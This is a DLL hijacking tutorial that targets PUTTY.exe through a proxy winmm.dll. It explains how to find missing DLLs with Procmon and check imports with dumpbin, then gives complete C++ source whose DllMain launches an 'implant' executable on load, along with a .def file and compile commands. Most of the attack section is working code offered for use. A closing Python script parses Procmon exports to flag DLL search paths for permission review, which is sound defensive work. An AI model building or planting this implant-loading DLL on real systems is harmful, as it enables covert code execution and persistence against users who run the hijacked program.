# DLL Hijacking

#### Procmon:

Open Procmon (Sysinternals) and filter on Result contains 'NOT FOUND' to spot DLLs the target searches for but never finds.

Once a candidate DLL has been found, identify which of its exports the binary actually imports by running:

```
dumpbin /imports PATH
```

In the dumpbin output, find the DLL you are looking to hijack; for this example we will use 'winmm.dll' and hijack PUTTY.exe. Look up each imported function (e.g. PlaySoundA) in the documentation to get its prototype:

```cpp
BOOL PlaySound(
   LPCTSTR pszSound,
   HMODULE hmod,
   DWORD   fdwSound
);
```

Open a debugger matching the architecture of the exe, watch how the app uses the library, and search for the imported function. Once found, step into the call to check what it does and which arguments it receives. Using the above example, this should show something similar to:

```
PlaySoundA (dword, dword, dword)
```

Then create the following DLL, adjusting the exports to match those your binary imports:

#### winmm.def:

```
LIBRARY "WinMM"
EXPORTS
  PlaySoundA
```

#### winmm.dll:

```cpp
#include <Windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    STARTUPINFO info = { sizeof(info) };
    PROCESS_INFORMATION processInfo;

    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // Runs once, when the hijacked process loads this DLL.
        // lpCommandLine is NULL rather than "" so no writable buffer is needed.
        if (CreateProcess(
                "c:\\implant\\implant.exe",
                NULL, NULL, NULL, TRUE, 0, NULL, NULL,
                &info, &processInfo)) {
            // Release our references; the child keeps running on its own.
            CloseHandle(processInfo.hThread);
            CloseHandle(processInfo.hProcess);
        }
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Stub for the one export PUTTY.exe imports from winmm.dll: it does nothing
// and reports success so the caller carries on as if the real call worked.
extern "C" {
    __declspec(dllexport) BOOL WINAPI PlaySoundA(
        LPCSTR pszSound,
        HMODULE hmod,
        DWORD fdwSound) {
        return TRUE;
    }
}
```

and compile using:

```batch
@ECHO OFF

cl.exe /W0 /D_USRDLL /D_WINDLL winmm.cpp winmm.def /MT /link /DLL /OUT:winmm.dll
```

(making sure you build for the same architecture as the target exe, i.e. from the matching x64 or x86 developer command prompt)

Place the DLL in the hijacked search path and it should be loaded on the next run.
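The Procmon step above is done by eye in the filter dialog; the following added script (not part of the original notes) does the same triage over a saved Procmon CSV export, so the search-order fall-through can be reviewed offline. The column layout is assumed to match Procmon's default CSV export, and the rows are a constructed sample in which putty.exe probes its own directory for winmm.dll before finding the real one in System32.

```python
import csv
import io
import ntpath
from collections import defaultdict

# Constructed sample of a Procmon CSV export (File > Save, CSV format). The
# column names are assumed from Procmon's default export; values are made up.
SAMPLE_EXPORT = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","putty.exe","4120","CreateFile","C:\\Tools\\putty\\winmm.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","putty.exe","4120","CreateFile","C:\\Windows\\System32\\winmm.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.3","putty.exe","4120","CreateFile","C:\\Tools\\putty\\putty.ini","NAME NOT FOUND","Desired Access: Generic Read"
"10:01:03.0","svchost.exe","900","CreateFile","C:\\Windows\\System32\\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"""

def dll_search_misses(export_text):
    """Return one finding per DLL path a process probed and did not find.

    Each finding is (process, dll, missed_path, loaded_from), where loaded_from
    is the path that later returned SUCCESS for the same DLL name (None if the
    DLL was never found at all). A miss in a directory the loader checks before
    System32 is exactly what the 'NOT FOUND' filter surfaces by hand.
    """
    misses = defaultdict(list)   # (process, dll) -> probed paths that failed
    loaded = {}                  # (process, dll) -> first path that succeeded
    for row in csv.DictReader(io.StringIO(export_text)):
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue             # only DLL probes matter for search-order review
        key = (row["Process Name"], ntpath.basename(path).lower())
        if row["Result"] == "NAME NOT FOUND":
            misses[key].append(path)
        elif row["Result"] == "SUCCESS":
            loaded.setdefault(key, path)
    return [(proc, dll, p, loaded.get((proc, dll)))
            for (proc, dll), paths in misses.items() for p in paths]

def outside_windows_dir(path):
    """True when the probed directory is not under C:\\Windows, i.e. a location
    that an ordinary user may be able to write to and therefore worth review."""
    return not ntpath.normcase(path).startswith(ntpath.normcase("C:\\Windows\\"))

if __name__ == "__main__":
    for proc, dll, missed, loaded_from in dll_search_misses(SAMPLE_EXPORT):
        flag = "REVIEW" if outside_windows_dir(missed) else "ok"
        print(f"{flag:6} {proc} probed {missed} (loaded from: {loaded_from})")
```

Pointing the script at a real export means reading the file instead of `SAMPLE_EXPORT`; every REVIEW line is a directory whose permissions should be checked.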
